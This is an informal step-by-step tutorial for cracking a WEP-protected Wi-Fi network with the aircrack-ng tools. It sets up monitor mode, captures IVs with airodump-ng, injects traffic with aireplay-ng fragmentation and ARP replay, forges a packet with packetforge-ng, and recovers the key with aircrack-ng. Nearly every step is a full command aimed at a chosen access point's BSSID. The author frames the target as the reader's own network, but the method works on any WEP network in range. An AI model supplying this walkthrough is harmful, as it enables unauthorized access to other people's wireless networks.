1. Type in “airmon-ng” to see wireless adaptors on your computer.

2. You should see a listing come up. Mine showed wlan0. Yours may be different, such
a rausb0.
Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0”
with whatever yours showed to be. This will create a new “virtual” device, and will
show the name. The name for mine was “mon0“
3. Open a new terminal window, and type “airodump mon0” again, replacing “mon0”
with your new virtual devices name.
You will begin to see a listing of different APs (access points). Find the one you want
and press Control + C. Pressing Control + C will cancel the current program running
in terminal. The name of the networks found is under the ESSID column. You may
not see anything there, which is fine, some of them are invisible. FUSiON is the name
of my network, so I went over to the BSSID column, and copied the address, which
was 00:23:69:18:E4:7D. This address is important, so I could recommend copying it,
or writing it down. Also take note of what channel it is on.
4. This is what I typed after that, “airodump-ng –bssid 00:23:69:18:E4:7D –channel 6
–ivs -w FUSiON mon0” This is all real easy stuff, so I’ll just explain it to you right
quick. airodump-ng is the program that captures what is called IVs, the primary
component in cracking WEP networks. Here goes!
o Type “airodump-ng”
o Add a space and type “–bssid 00:23:69:18:E4:7D” replacing the address with
the address of your Network. This “flag” says we only want to see this
address, and nothing else.
o Add a space and type “–channel 6″ replacing the number 6 with the number
of the channel of your Network (although 6 is VERY common, so don’t be
surprised if that is it)
o Add a space and type “–ivs” This command only captures IVs, which will
make cracking the password faster.
o Add a space and type “-w FUSiON” replacing FUSiON with the name of
your network, or something that you will remember, as we will be cracking
this file later to find the password. I just use the name of the network, because
it helps me remember easier.
o The “mon0″ at the end, simply defines which device to use.
5. Open a New Terminal Window. In it, type “aireplay-ng -5 -b 00:23:69:18:E4:7D
mon0″
o aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn’t be
possible to crack most WEP networks.
o The “-5″ flag is one method, and the most common, that is used to generate
the IVs.
o The “-b 00:23:69:18:E4:7D” tells which address to attack. The -b stands for
bssid which is the address of your network. So you will have to replace
00:23:69:18:E4:7D with the address of your network (the one that I
recommended you write down or copy earlier).
o The “mon0″ at the end, again just defines which device to use.
6. Wait and Press “Y” for yes, when it asks if you would like to use the selected frame.
7. This process may have to be repeated until you have a resulting fragment file. It will
say when you do. Additionally, you can run this command “aireplay-ng -1 1 -a
00:23:69:18:E4:7D mon0″ to help assist with getting a fragment file. Again, make
sure to replace my address, with your own.
8. Now we must build a file that will be used to gather those precious IVs! I did it with
the following command:
“packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k
255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy”
Let me break this down for you.
o packetforge-ng is the program which will build the arp file, as I like to call it,
which you will soon see.
o Add a space, and follow it with “-0 -a 00:23:69:18:E4:7D” and of course,
replace it with your own network address.
o Add a space, and type in “-h 00:11:22:33:44:55 -k 255.255.255.255 -l
255.255.255.255″ This part of the command is pretty universal, rarely is it
changed. So we won’t go into detail on it here.
o Add a space, and type in “-y fragment-XXXX-XXXXXX.xor”, replacing
your fragment file, place of this one, as well.
o And lastly, type in “-w arpy” just the -w is important. The arpy can be
anything you can remember. It’s something I’ve just always used, cuz it’s easy
for me to remember.
o If all goes well, it Successfully built our Arp Packet.
9. Almost Done!  “aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0″ is our next
command.
o aireplay-ng, like before, should get those IVs flowing in. At an average, I see
about 500 IVs/Second. Which isn’t too bad. But some cards do better than
others, so you may have better, or worse luck.
o -r arpy is a flag that tells aireplay-ng to play the arp file we created called
arpy.
o Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and
mon0 says which wireless interface to use.
10. If all went well, we are gathering IVs! Open the airodump-ng terminal window that
we’ve had open, and look at the Data column. It should be constantly rising. This is
the longest process, as we have to wait. While others recommend you getting at least
100,000 IVs, I’ve never waited that long. I’ve cracked many WEPs at just 20,000,
although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a
while until you have enough accumilated.
11. Once you have at least 40,000, we can start cracking the WEP Password!
o This step, has to be the simplest.
o Open a new Terminal window, and type “aircrack-ng XXXX-01.ivs”
replacing the XXXX with what you used when you first started the airodump-
ng command.
o Depending on the speed of your computer, you will soon have the WEP Key
Decrypted. Just make sure to remove the colons “:” before confirming the
Key.